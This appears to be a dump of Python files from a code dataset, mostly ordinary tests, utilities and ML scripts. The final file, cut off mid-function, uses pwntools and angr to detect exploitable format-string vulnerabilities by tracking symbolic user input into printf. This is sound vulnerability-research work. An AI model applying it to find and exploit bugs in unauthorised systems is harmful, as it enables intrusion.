id | text | dataset_id
---|---|---|
5154983
|
# Repository: maykinmedia/bluebottle
import json
from django.test import TestCase
from django.core.urlresolvers import reverse
from bluebottle.test.factory_models.projects import (
ProjectFactory, ProjectThemeFactory,
ProjectPhaseFactory)
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.utils import InitProjectDataMixin, BluebottleTestCase
from rest_framework import status
from ..models import ProjectPhase, ProjectTheme
class ProjectEndpointTestCase(BluebottleTestCase):
"""
Base class for ``projects`` app API endpoints test cases.
Sets up a common set of three ``Project``s and three ``ProjectTheme``s,
as well as a dummy testing user which can be used for unit tests.
"""
def setUp(self):
super(ProjectEndpointTestCase, self).setUp()
self.user = BlueBottleUserFactory.create()
self.user_token = "JWT {0}".format(self.user.get_jwt_token())
self.phase_1 = ProjectPhase.objects.get(slug='plan-new')
self.phase_2 = ProjectPhase.objects.get(slug='plan-submitted')
self.phase_3 = ProjectPhase.objects.get(slug='campaign')
self.theme_1 = ProjectTheme.objects.get(id=1)
self.theme_2 = ProjectTheme.objects.get(id=2)
self.theme_3 = ProjectTheme.objects.get(id=3)
self.project_1 = ProjectFactory.create(owner=self.user, status=self.phase_1, theme=self.theme_1)
self.project_2 = ProjectFactory.create(owner=self.user, status=self.phase_2, theme=self.theme_2)
self.project_3 = ProjectFactory.create(owner=self.user, status=self.phase_3, theme=self.theme_3)
class TestProjectPhaseList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectPhase`` API view. Returns all the Phases
that can be assigned to a project.
Endpoint: /api/projects/phases/
"""
def test_api_phases_list_endpoint(self):
"""
Tests that the list of project phases can be obtained from its
endpoint.
"""
response = self.client.get(reverse('project_phase_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
available_phases = ProjectPhase.objects.all()
self.assertEqual(data['count'], len(available_phases),
"Failed to load all the available phases")
for item in data['results']:
self.assertIn('id', item)
self.assertIn('name', item)
self.assertIn('description', item)
self.assertIn('sequence', item)
self.assertIn('active', item)
self.assertIn('editable', item)
self.assertIn('viewable', item)
class TestProjectList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectList`` API view.
Endpoint: /api/projects/projects/
"""
def test_api_project_list_endpoint(self):
"""
Test the API endpoint for Projects list.
"""
response = self.client.get(reverse('project_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
# Check that it is returning our 1 viewable factory-model project.
self.assertEqual(data['count'], 1)
# Check sanity on the JSON response.
for item in data['results']:
self.assertIn('created', item)
self.assertIn('description', item)
self.assertIn('id', item)
self.assertIn('image', item)
self.assertIn('meta_data', item)
self.assertIn('owner', item)
self.assertIn('status', item)
            # Ensure that non-viewable statuses are filtered out
phase = ProjectPhase.objects.get(id=item['status'])
self.assertTrue(phase.viewable, "Projects with non-viewable status were returned")
def test_api_project_list_endpoint_status_viewable(self):
"""
Test that the non-viewable projects are not returned by the API.
"""
self.phase_3.viewable = False
self.phase_3.save()
# So, now our ``self.project_3`` should be non-viewable...
response = self.client.get(reverse('project_list'))
data = json.loads(response.content)
        # We created 3 projects, but none are viewable now that phase_3 has been made non-viewable...
self.assertEqual(data['count'], 0)
class TestProjectDetail(ProjectEndpointTestCase):
"""
Test case for the ``ProjectDetail`` API view.
Endpoint: /api/projects/projects/{slug}
"""
def test_api_project_detail_endpoint(self):
"""
Test the API endpoint for Project detail.
"""
response = self.client.get(
reverse('project_detail', kwargs={'slug': self.project_1.slug}))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('created', data)
self.assertIn('description', data)
self.assertIn('id', data)
self.assertIn('image', data)
self.assertIn('meta_data', data)
self.assertIn('owner', data)
self.assertIn('status', data)
class TestProjectPreviewList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectPreviewList`` API view.
Endpoint: /api/projects/previews
"""
def test_api_project_preview_list_endpoint(self):
"""
Test the API endpoint for Project preview list.
"""
response = self.client.get(reverse('project_preview_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data['count'], 1)
for item in data['results']:
self.assertIn('id', item)
self.assertIn('title', item)
self.assertIn('image', item)
self.assertIn('status', item)
self.assertIn('country', item)
class TestProjectPreviewDetail(ProjectEndpointTestCase):
"""
Test case for the ``ProjectPreviewDetail`` API view.
Endpoint: /api/projects/preview/{slug}
"""
def test_api_project_preview_detail_endpoint(self):
"""
Test the API endpoint for Project preview detail.
"""
response = self.client.get(
reverse('project_preview_detail',
kwargs={'slug': self.project_1.slug}))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('title', data)
self.assertIn('image', data)
self.assertIn('status', data)
self.assertIn('country', data)
class TestProjectThemeList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectThemeList`` API view.
Endpoint: /api/projects/themes
"""
def test_api_project_theme_list_endpoint(self):
"""
Test the API endpoint for Project theme list.
"""
response = self.client.get(reverse('project_theme_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(len(data), 3)
for item in data:
self.assertIn('id', item)
self.assertIn('name', item)
class TestProjectThemeDetail(ProjectEndpointTestCase):
"""
Test case for the ``ProjectThemeDetail`` API view.
Endpoint: /api/projects/themes/{pk}
"""
def test_api_project_theme_detail_endpoint(self):
"""
Test the API endpoint for Project theme detail.
"""
response = self.client.get(
reverse('project_theme_detail', kwargs={'pk': self.project_1.pk}))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('name', data)
class TestManageProjectList(ProjectEndpointTestCase):
"""
Test case for the ``ManageProjectList`` API view.
Endpoint: /api/projects/manage
"""
def test_api_manage_project_list_endpoint_login_required(self):
"""
Test login required for the API endpoint for manage Project list.
"""
response = self.client.get(reverse('project_manage_list'))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, response.data)
data = json.loads(response.content)
self.assertEqual(
data['detail'], 'Authentication credentials were not provided.')
def test_api_manage_project_list_endpoint_success(self):
"""
Test successful request for a logged in user over the API endpoint for
manage Project list.
"""
response = self.client.get(reverse('project_manage_list'), HTTP_AUTHORIZATION=self.user_token)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data['count'], 3)
for item in data['results']:
self.assertIn('id', item)
self.assertIn('created', item)
self.assertIn('title', item)
self.assertIn('url', item)
self.assertIn('status', item)
self.assertIn('image', item)
self.assertIn('pitch', item)
self.assertIn('description', item)
self.assertIn('country', item)
self.assertIn('editable', item)
def test_api_manage_project_list_endpoint_post(self):
"""
Test successful POST request over the API endpoint for manage Project
list.
"""
post_data = {
'slug': 'test-project',
'title': 'Testing Project POST request',
'pitch': 'A new project to be used in unit tests',
'theme': self.theme_1.pk,
'status': self.phase_1.pk
}
response = self.client.post(reverse('project_manage_list'), post_data, HTTP_AUTHORIZATION=self.user_token)
self.assertEqual(response.status_code, 201)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('created', data)
self.assertIn('title', data)
self.assertIn('url', data)
self.assertIn('status', data)
self.assertIn('image', data)
self.assertIn('pitch', data)
self.assertIn('description', data)
self.assertIn('country', data)
self.assertIn('editable', data)
class TestManageProjectDetail(ProjectEndpointTestCase):
"""
Test case for the ``ManageProjectDetail`` API view.
Endpoint: /api/projects/manage/{slug}
"""
def test_api_manage_project_detail_endpoint_login_required(self):
"""
Test login required for the API endpoint for manage Project detail.
"""
response = self.client.get(
reverse('project_manage_detail', kwargs={'slug': self.project_1.slug}))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, response.data)
data = json.loads(response.content)
self.assertEqual(
data['detail'], 'Authentication credentials were not provided.')
def test_api_manage_project_detail_endpoint_not_owner(self):
"""
Test unauthorized request made by a user who is not the owner of the
Project over the API endpoint for manage Project detail.
"""
user = BlueBottleUserFactory.create(
email='<EMAIL>',
username='janedoe'
)
token = "JWT {0}".format(user.get_jwt_token())
response = self.client.get(
reverse('project_manage_detail', kwargs={'slug': self.project_1.slug}),
HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, 403)
data = json.loads(response.content)
self.assertEqual(
data['detail'], 'You do not have permission to perform this action.')
def test_api_manage_project_detail_endpoint_success(self):
"""
Test successful request for a logged in user over the API endpoint for
manage Project detail.
"""
response = self.client.get(
reverse('project_manage_detail', kwargs={'slug': self.project_1.slug}),
HTTP_AUTHORIZATION=self.user_token)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('created', data)
self.assertIn('title', data)
self.assertIn('url', data)
self.assertIn('status', data)
self.assertIn('image', data)
self.assertIn('pitch', data)
self.assertIn('description', data)
self.assertIn('country', data)
self.assertIn('editable', data)
|
StarcoderdataPython
|
87349
|
# Repository: bmanzella/zhuartcc.org (1-10 GitHub stars)
from django.contrib import admin
from .models import Event, EventPosition, PositionPreset, EventPositionRequest, EventScore
@admin.register(Event)
class EventAdmin(admin.ModelAdmin):
list_display = ('name', 'host', 'start', 'end', 'hidden')
@admin.register(EventPosition)
class EventPositionAdmin(admin.ModelAdmin):
list_display = ('event', 'user', 'name')
@admin.register(EventPositionRequest)
class EventPositionRequestAdmin(admin.ModelAdmin):
list_display = ('position', 'user')
@admin.register(PositionPreset)
class PositionPresetAdmin(admin.ModelAdmin):
list_display = ('name', 'positions_json')
@admin.register(EventScore)
class EventScoreAdmin(admin.ModelAdmin):
list_display = ('user', 'event', 'score')
|
StarcoderdataPython
|
1967264
|
from rover import turn, move, Position, Plateau, Rover, parse, World, main
import pytest
def test_turn_left():
assert turn('N', 'L') == 'W'
assert turn('W', 'L') == 'S'
assert turn('S', 'L') == 'E'
assert turn('E', 'L') == 'N'
def test_turn_right():
assert turn('N', 'R') == 'E'
assert turn('W', 'R') == 'N'
assert turn('S', 'R') == 'W'
assert turn('E', 'R') == 'S'
def test_move():
assert move( Position(1,2,'N') ) == Position(1,3,'N')
assert move( Position(1,2,'W')) == Position(0,2,'W')
assert move( Position(1,2,'S')) == Position(1,1,'S')
assert move( Position(1,2,'E')) == Position(2,2,'E')
def test_illegal_plateau():
with pytest.raises(ValueError):
Plateau(0,0)
def test_ok_plateau():
assert Plateau(1,2).max_x == 1
assert Plateau(1,2).max_y == 2
def test_plateau_contains():
assert Plateau(1,0).contains(Position(0, 0, 'W'))
assert Plateau(1,0).contains(Position(1, 0, 'W'))
assert Plateau(1,0).contains(Position(-1, 0, 'W')) is False
assert Plateau(1,0).contains(Position(0, -1, 'W')) is False
assert Plateau(1,0).contains(Position(1, 1, 'W')) is False
assert Plateau(1,0).contains(Position(0, 1, 'W')) is False
def test_move_rover_on_plateau():
plateau = Plateau(5,5)
rover = Rover( Position(1,2,'N'), plateau)
rover.move()
assert rover.position == Position(1,3, 'N')
def test_move_rover_over_edge():
plateau = Plateau(0,1)
rover = Rover( Position(0,1,'N'), plateau)
with pytest.raises(ValueError):
rover.move()
def test_parse_input():
input = """\
5 5
1 2 N
LMLMLMLMM
3 3 E
MMRMMRMRRM
"""
world = parse(input)
assert world.plateau == Plateau(5,5)
assert str(world.rovers) == "[Rover(Position(x=1, y=2, heading='N'), Plateau(max_x=5, max_y=5)), Rover(Position(x=3, y=3, heading='E'), Plateau(max_x=5, max_y=5))]"
assert str(world.instructions) == "['LMLMLMLMM', 'MMRMMRMRRM']"
def test_move_world():
rovers = [Rover(Position(x=1, y=2, heading='N'), Plateau(max_x=5, max_y=5)), Rover(Position(x=3, y=3, heading='E'), Plateau(max_x=5, max_y=5))]
world = World(Plateau(5, 5))
world.rovers = rovers
world.instructions = ["LMLMLMLMM", "MMRMMRMRRM"]
world.follow_instructions()
assert world.rovers[0].position == Position(1, 3, 'N')
assert world.rovers[1].position == Position(5, 1, 'E')
def test_report_position():
plateau = Plateau(0,1)
rover = Rover( Position(0,1,'N'), plateau)
assert "0 1 N\n" == rover.report_position()
def test_main():
input = """\
5 5
1 2 N
LMLMLMLMM
3 3 E
MMRMMRMRRM
"""
output = main(input)
expected_output = """\
1 3 N
5 1 E
"""
assert output == expected_output
|
StarcoderdataPython
|
1932803
|
# File: boilerplate/helpers/enterinteractivemode.py
'''
Created on Jul 9, 2018
@author: havrila
'''
def interactive():
import code
code.interact(local=locals())
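# Usage sketch (not part of the original helper): call ``interactive()`` from any
# point in a script to drop into a REPL. Note that ``locals()`` here exposes only
# this function's own namespace (essentially just ``code``), not the caller's
# variables.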
|
StarcoderdataPython
|
245640
|
# File: yakut/enum_param.py
# Copyright (c) 2020 OpenCyphal
# This software is distributed under the terms of the MIT License.
# Author: <NAME> <<EMAIL>>
import enum
import typing
import click
class EnumParam(click.Choice):
"""
A parameter that allows the user to select one of the enum options.
The selection is case-insensitive and abbreviations are supported out of the box:
F, foo, and FOO_BAR are all considered equivalent as long as there are no ambiguities.
"""
def __init__(self, e: enum.EnumMeta) -> None:
self._enum = e
super().__init__(list(e.__members__), case_sensitive=False)
def convert(
self,
value: typing.Union[str, enum.Enum],
param: typing.Optional[click.Parameter],
ctx: typing.Optional[click.Context],
) -> typing.Any:
if isinstance(value, enum.Enum): # This is to support default enum options.
value = value.name
assert isinstance(value, str)
candidates: typing.List[enum.Enum] = [ # type: ignore
x for x in self._enum if x.name.upper().startswith(value.upper())
]
if len(candidates) == 0:
raise click.BadParameter(f"Value {value!r} is not a valid choice for {list(self._enum.__members__)}")
if len(candidates) > 1:
raise click.BadParameter(f"Value {value!r} is ambiguous; possible matches: {[x.name for x in candidates]}")
return candidates[0]
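# --- Usage sketch (not part of the original module) ---
# A hedged example of wiring EnumParam into a click command; the ``Verbosity``
# enum and the ``--verbosity`` option below are hypothetical. Abbreviated,
# case-insensitive values such as ``deb`` resolve to ``Verbosity.DEBUG``.
if __name__ == "__main__":
    class Verbosity(enum.Enum):
        DEBUG = enum.auto()
        INFO = enum.auto()
        WARNING = enum.auto()

    @click.command()
    @click.option("--verbosity", type=EnumParam(Verbosity), default=Verbosity.INFO)
    def _demo(verbosity: Verbosity) -> None:
        click.echo(verbosity.name)

    _demo()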
|
StarcoderdataPython
|
11280252
|
# -*- coding: utf-8 -*-
"""<div> template"""
from ..environment import env
div = env.from_string("""\
<div {% if align -%} align="{{ align }}" {% endif -%}>
{%- if text -%} {{ text }} {%- endif -%}</div>
""")
|
StarcoderdataPython
|
8063727
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""linebot.models.emojis module."""
from __future__ import unicode_literals
from abc import ABCMeta
from future.utils import with_metaclass
from .base import Base
class Emojis(with_metaclass(ABCMeta, Base)):
"""Emojis.
https://developers.line.biz/en/reference/messaging-api/#text-message
"""
def __init__(self, index=None, product_id=None, emoji_id=None, **kwargs):
"""__init__ method.
:param kwargs:
"""
super(Emojis, self).__init__(**kwargs)
self.index = index
self.product_id = product_id
self.emoji_id = emoji_id
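# Usage sketch (not part of the original module; the IDs below are placeholders,
# not real LINE emoji identifiers): one ``Emojis`` entry describes a single "$"
# placeholder inside a text message's emoji list, e.g.
#     Emojis(index=0, product_id="<product_id>", emoji_id="<emoji_id>")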
|
StarcoderdataPython
|
11302733
|
import os
import sys
from Bio import SeqIO
from Bio.Seq import Seq
def main(*args, **kwargs):
fpath = os.path.join(os.getcwd(), args[-1])
records = list(SeqIO.parse(fpath,'fasta'))
s = str(records[0].seq)
t = str(records[1].seq)
idxs = []
idx = 0
for m in t:
idx = s.find(m,idx)
idx += 1
idxs.append(idx)
for idx in idxs:
        print(idx, end=' ')
if __name__ == '__main__':
main(*sys.argv)
|
StarcoderdataPython
|
1905831
|
# Repository: neuron-ai/easyneuron
from io import BufferedReader, BufferedWriter
from typing import (Any, Iterable, List, Sequence, Set,
Sized, SupportsFloat, SupportsInt, Tuple, Union)
from numpy import (float16, float32, float64, int0, int8, int16, int32, int64,
ndarray)
# Numerical
NumpyFloat = Union[float64, float32, float16] # Numpy Float types
NumpyInt = Union[int0, int8, int16, int32, int64] # Numpy Int types
BuiltinNumbers = Union[int, float] # Builtin number types
# Any numerical, or numpy numerical types
Numerical = Union[BuiltinNumbers, NumpyFloat, NumpyInt, SupportsInt, SupportsFloat]
# External types for set-like objects
ExternalSets = ndarray
BuiltinSets = Union[List, Tuple, Set] # Builtin set-like types
SequentialObject = Union[ExternalSets, BuiltinSets] # All set-like objects
Data = Union[
SequentialObject, Numerical
] # A Union of sequences that can be used alonside numerical values
X_Data = Sequence[Sequence[Numerical]] # 2D Arrays
ArrayLike = Union[SequentialObject, Iterable, Sequence, Sized, Any]
# Files
WritableFile = Union[str, BufferedWriter]
ReadableFile = Union[str, BufferedReader]
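# Usage sketch (not part of the original module): the aliases above are meant for
# annotating numeric APIs, e.g. a hypothetical helper
#     def euclidean(a: X_Data, b: X_Data) -> Numerical: ...
# so that callers may pass lists, tuples or numpy arrays interchangeably.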
|
StarcoderdataPython
|
9682545
|
from typing import *
import numpy as np
from ..typing_ import *
from .misc import generate_random_seed
__all__ = [
'get_array_shape', 'to_number_or_numpy', 'minibatch_slices_iterator',
'arrays_minibatch_iterator', 'split_numpy_arrays', 'split_numpy_array',
]
def get_array_shape(arr) -> ArrayShape:
"""
Inspect the shape of an array-like object.
>>> get_array_shape(1)
()
>>> get_array_shape(2.5)
()
>>> get_array_shape(np.zeros([1, 2, 3]))
(1, 2, 3)
Args:
arr: The array-like object.
Returns:
The shape of the array.
"""
if isinstance(arr, (float, int)):
return ()
if hasattr(arr, 'shape'):
# TensorFlow, PyTorch and NumPy tensors should all have ``.shape``
return tuple(arr.shape)
return np.shape(arr)
def to_number_or_numpy(arr) -> Union[np.ndarray, float, int]:
"""
Convert an array-like object into NumPy array or int/float number.
Args:
arr: The array-like object.
Returns:
The converted NumPy array.
"""
if isinstance(arr, (float, int, np.ndarray)):
return arr
elif hasattr(arr, 'numpy'):
# TensorFlow and PyTorch tensor has ``.numpy()``.
if hasattr(arr, 'detach'): # PyTorch further requires ``.detach()`` before calling ``.numpy()``
arr = arr.detach()
if hasattr(arr, 'cpu'): # PyTorch further requires ``.cpu()`` before calling ``.numpy()``
arr = arr.cpu()
return arr.numpy()
else:
return np.array(arr)
def minibatch_slices_iterator(length: int,
batch_size: int,
skip_incomplete: bool = False
) -> Generator[slice, None, None]:
"""
Iterate through all the mini-batch slices.
Args:
length: Total length of data in an epoch.
batch_size: Size of each mini-batch.
skip_incomplete: If :obj:`True`, discard the final
batch if it contains less than `batch_size` number of items.
(default :obj:`False`)
Yields
Slices of each mini-batch. The last mini-batch may contain less
indices than `batch_size`.
"""
start = 0
stop1 = (length // batch_size) * batch_size
while start < stop1:
yield slice(start, start + batch_size, 1)
start += batch_size
if not skip_incomplete and start < length:
yield slice(start, length, 1)
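# Example (not part of the original module): minibatch_slices_iterator(5, 2)
# yields slice(0, 2, 1), slice(2, 4, 1) and, because skip_incomplete defaults to
# False, the trailing slice(4, 5, 1).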
def arrays_minibatch_iterator(arrays: Sequence[Array],
batch_size: int,
skip_incomplete: bool = False
) -> Generator[slice, None, None]:
"""
Iterate through all the mini-batches in the arrays.
Args:
arrays: Total length of data in an epoch.
batch_size: Size of each mini-batch.
skip_incomplete: If :obj:`True`, discard the final
batch if it contains less than `batch_size` number of items.
(default :obj:`False`)
Yields
Tuple of arrays of each mini-batch. The last mini-batch may contain
less indices than `batch_size`.
"""
length = len(arrays[0])
for slc in minibatch_slices_iterator(
length, batch_size=batch_size, skip_incomplete=skip_incomplete):
yield tuple(a[slc] for a in arrays)
def split_numpy_arrays(arrays: Sequence[np.ndarray],
portion: Optional[float] = None,
size: Optional[int] = None,
shuffle: bool = True,
random_state: Optional[np.random.RandomState] = None
) -> Tuple[Tuple[np.ndarray, ...],
Tuple[np.ndarray, ...]]:
"""
Split numpy arrays into two halves, by portion or by size.
Args:
arrays: Numpy arrays to be splitted.
portion: Portion of the second half. Ignored if `size` is specified.
size: Size of the second half.
shuffle: Whether or not to shuffle before splitting?
random_state: Optional numpy RandomState for shuffling data. (default
:obj:`None`, construct a new :class:`np.random.RandomState`).
Returns:
The two halves of the arrays after splitting.
"""
# check the arguments
if size is None and portion is None:
raise ValueError('At least one of `portion` and `size` should '
'be specified.')
# zero arrays should return empty tuples
arrays = tuple(arrays)
if not arrays:
return (), ()
# check the length of provided arrays
data_count = len(arrays[0])
for array in arrays[1:]:
if len(array) != data_count:
raise ValueError('The length of specified arrays are not equal.')
# determine the size for second half
if size is None:
if portion < 0.0 or portion > 1.0:
raise ValueError('`portion` must range from 0.0 to 1.0.')
elif portion < 0.5:
size = data_count - int(data_count * (1.0 - portion))
else:
size = int(data_count * portion)
# shuffle the data if necessary
if shuffle:
random_state = \
random_state or np.random.RandomState(generate_random_seed())
indices = np.arange(data_count)
random_state.shuffle(indices)
arrays = tuple(a[indices] for a in arrays)
# return directly if each side remains no data after splitting
if size <= 0:
return arrays, tuple(a[:0] for a in arrays)
elif size >= data_count:
return tuple(a[:0] for a in arrays), arrays
# split the data according to demand
return (
tuple(v[: -size, ...] for v in arrays),
tuple(v[-size:, ...] for v in arrays)
)
def split_numpy_array(array: np.ndarray,
portion: Optional[float] = None,
size: Optional[int] = None,
shuffle: bool = True) -> Tuple[np.ndarray, ...]:
"""
Split numpy array into two halves, by portion or by size.
Args:
array: A numpy array to be splitted.
portion: Portion of the second half. Ignored if `size` is specified.
size: Size of the second half.
shuffle: Whether or not to shuffle before splitting?
Returns:
The two halves of the array after splitting.
"""
(a,), (b,) = split_numpy_arrays((array,), portion=portion, size=size,
shuffle=shuffle)
return a, b
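# Example (not part of the original module): splitting without shuffling,
#     a, b = split_numpy_array(np.arange(10), portion=0.2, shuffle=False)
# keeps the first 8 elements in ``a`` and the last 2 in ``b``.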
|
StarcoderdataPython
|
196
|
# -*- encoding:utf-8 -*-
# @Time : 2021/1/3 15:15
# @Author : gfjiang
import os.path as osp
import mmcv
import numpy as np
import cvtools
import matplotlib.pyplot as plt
import cv2.cv2 as cv
from functools import partial
import torch
import math
from cvtools.utils.path import add_prefix_filename_suffix
from mmdet.ops import nms
from mmdet.apis import init_detector, inference_detector
def draw_features(module, input, output, work_dir='./'):
x = output.cpu().numpy()
out_channels = list(output.shape)[1]
height = int(math.sqrt(out_channels))
width = height
if list(output.shape)[2] < 128:
return
fig = plt.figure(figsize=(32, 32))
fig.subplots_adjust(left=0.05, right=0.95, bottom=0.05, top=0.95, wspace=0.05, hspace=0.05)
for i in range(height * width):
plt.subplot(height, width, i + 1)
plt.axis('off')
img = x[0, i, :, :]
pmin = np.min(img)
pmax = np.max(img)
        img = ((img - pmin) / (pmax - pmin + 0.000001))*255  # scale float values in [0, 1] to 0-255
        img = img.astype(np.uint8)  # convert to uint8
        img = cv.applyColorMap(img, cv.COLORMAP_JET)  # generate a heat map
        img = img[:, :, ::-1]  # note: cv2 uses BGR while matplotlib expects RGB, so reverse the channels
plt.imshow(img)
# print("{}/{}".format(i,width*height))
savename = get_image_name_for_hook(module, work_dir)
fig.savefig(savename, dpi=100)
fig.clf()
plt.close()
def get_image_name_for_hook(module, work_dir='./'):
"""
Generate image filename for hook function
Parameters:
-----------
module: module of neural network
"""
# os.makedirs(work_dir, exist_ok=True)
module_name = str(module)
base_name = module_name.split('(')[0]
index = 0
    image_name = '.'  # '.' surely exists, to make the first loop condition True
while osp.exists(image_name):
index += 1
image_name = osp.join(
work_dir, 'feats', '%s_%d.png' % (base_name, index))
return image_name
class AerialDetectionOBB(object):
def __init__(self, config, pth):
self.imgs = []
self.cfg = mmcv.Config.fromfile(config)
self.pth = pth
print('loading model {} ...'.format(pth))
self.model = init_detector(self.cfg, self.pth, device='cuda:0')
self.results = []
self.img_detected = []
# self.vis_feats((torch.nn.Conv2d, torch.nn.MaxPool2d))
def __call__(self,
imgs_or_path,
det_thrs=0.5,
vis=False,
vis_thr=0.5,
save_root=''):
if isinstance(imgs_or_path, str):
self.imgs += cvtools.get_files_list(imgs_or_path)
else:
self.imgs += imgs_or_path
prog_bar = mmcv.ProgressBar(len(self.imgs))
for _, img in enumerate(self.imgs):
self.detect(img, det_thrs=det_thrs, vis=vis,
vis_thr=vis_thr, save_root=save_root)
prog_bar.update()
def detect(self,
img,
det_thrs=0.5,
vis=False,
vis_thr=0.5,
save_root=''):
result = inference_detector(self.model, img)
# result = self.nms(result)
if isinstance(det_thrs, float):
det_thrs = [det_thrs] * len(result)
if vis:
to_file = osp.join(save_root, osp.basename(img))
to_file = add_prefix_filename_suffix(to_file, suffix='_obb')
self.vis(img, result, vis_thr=vis_thr, to_file=to_file)
result = [det[det[..., -1] > det_thr] for det, det_thr
in zip(result, det_thrs)]
if len(result) == 0:
print('detect: image {} has no object.'.format(img))
self.img_detected.append(img)
self.results.append(result)
return result
def nms(self, result, nms_th=0.3):
dets_num = [len(det_cls) for det_cls in result]
result = np.vstack(result)
_, ids = nms(result, nms_th)
total_num = 0
nms_result = []
for num in dets_num:
ids_cls = ids[np.where((total_num <= ids) & (ids < num))[0]]
nms_result.append(result[ids_cls])
total_num += num
return nms_result
def vis(self, img, bbox_result, vis_thr=0.5,
to_file='vis.jpg'):
bboxes = np.vstack(bbox_result)
labels = [
np.full(bbox.shape[0], i, dtype=np.int32)
for i, bbox in enumerate(bbox_result)
]
labels = np.concatenate(labels)
inds = np.where(bboxes[:, -1] > vis_thr)[0]
bboxes = bboxes[inds]
labels = labels[inds]
texts = [self.model.CLASSES[index]+'|'+str(round(bbox[-1], 2))
for index, bbox in zip(labels, bboxes)]
img = cvtools.draw_boxes_texts(
img, bboxes[:, :-1], box_format='polygon', line_width=2)
cvtools.imwrite(img, to_file)
def vis_feats(self, modules_for_plot):
h, w = self.cfg.data.train.img_scale
for name, module in self.model.named_modules():
if isinstance(module, modules_for_plot):
draw_features_func = partial(
draw_features, work_dir=self.cfg.work_dir)
module.register_forward_hook(draw_features_func)
def save_results(self, save):
str_results = ''
for i, img in enumerate(self.img_detected):
result = self.results[i]
img = osp.basename(img)
for cls_index, dets in enumerate(result):
cls = self.model.CLASSES[cls_index]
for box in dets:
bbox_str = ','.join(map(str, map(int, box[:4])))
str_results += ' '.join([img, cls, bbox_str]) + '\n'
with open(save, 'w') as f:
f.write(str_results)
if __name__ == '__main__':
config_file = 'configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota_1gpus_mdanet2.py'
pth_file = 'work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota_1gpus_mdanet2/epoch_12.pth'
detector = AerialDetectionOBB(config_file, pth_file)
detector('/media/data/DOTA/crop/P2701_2926_1597_3949_2620.png', vis=True,
save_root='work_dirs/attention_vis/')
detector.save_results('work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota_1gpus_mdanet2/detect_result.txt')
|
StarcoderdataPython
|
1850535
|
"""
Tested with:
Python 3.7.7
scikit-learn==0.24.2
"""
import json
import joblib
from sklearn import svm
from sklearn import datasets
classes = {"0": "Setosa", "1": "Versicolour", "2": "Virginica" }
clf = svm.SVC(gamma='scale', probability=True)
iris = datasets.load_iris()
X, y = iris.data, iris.target
clf.fit(X, y)
###
# Export / Store
###
joblib.dump(clf, open("model.joblib", "wb"))
with open("classes.json", "w") as f:
f.write(json.dumps(classes))
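###
# Load back (usage sketch, not part of the original script)
###
loaded_clf = joblib.load("model.joblib")
with open("classes.json") as f:
    loaded_classes = json.load(f)
# Predict the first iris sample and map the numeric label to its class name.
print(loaded_classes[str(loaded_clf.predict(X[:1])[0])])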
|
StarcoderdataPython
|
1951025
|
from pwn import *
import angr
import claripy
import tqdm
from .simgr_helper import get_trimmed_input
import logging
import copy
log = logging.getLogger(__name__)
# Better symbolic strlen
def get_max_strlen(state, value):
i = 0
for c in value.chop(8): # Chop by byte
i += 1
if not state.solver.satisfiable([c != 0x00]):
log.debug("Found the null at offset : {}".format(i))
return i - 1
return i
"""
Model either printf("User input") or printf("%s","Userinput")
"""
class printFormat(angr.procedures.libc.printf.printf):
IS_FUNCTION = True
input_index = 0
"""
Checks userinput arg
"""
def __init__(self, input_index):
# Set user input index for different
# printf types
self.input_index = input_index
angr.procedures.libc.printf.printf.__init__(self)
def checkExploitable(self, fmt):
bits = self.state.arch.bits
load_len = int(bits / 8)
max_read_len = 1024
"""
For each value passed to printf
Check to see if there are any symbolic bytes
Passed in that we control
"""
i = self.input_index
state = self.state
solv = state.solver.eval
# fmt_len = self._sim_strlen(fmt)
# # We control format specifier and strlen isn't going to be helpful,
# # just set it ourselves
# if len(state.solver.eval_upto(fmt_len,2)) > 1:
# while not state.satisfiable(extra_constraints=[fmt_len == max_read_len]):
# max_read_len -=1
# if max_read_len < 0:
# raise Exception("fmt string with no length!")
# state.add_constraints(fmt_len == max_read_len)
printf_arg = self.arguments[i]
var_loc = solv(printf_arg)
# Parts of this argument could be symbolic, so we need
# to check every byte
var_data = state.memory.load(var_loc, max_read_len)
var_len = get_max_strlen(state, var_data)
fmt_len = self._sim_strlen(fmt)
# if len(state.solver.eval_upto(fmt_len,2)) > 1:
# state.add_constraints(fmt_len == var_len)
# Reload with just our max len
var_data = state.memory.load(var_loc, var_len)
log.info("Building list of symbolic bytes")
symbolic_list = [
state.memory.load(var_loc + x, 1).symbolic for x in range(var_len)
]
log.info("Done Building list of symbolic bytes")
"""
Iterate over the characters in the string
Checking for where our symbolic values are
This helps in weird cases like:
char myVal[100] = "I\'m cool ";
strcat(myVal,STDIN);
printf(myVal);
"""
position = 0
count = 0
greatest_count = 0
prev_item = symbolic_list[0]
for i in range(1, len(symbolic_list)):
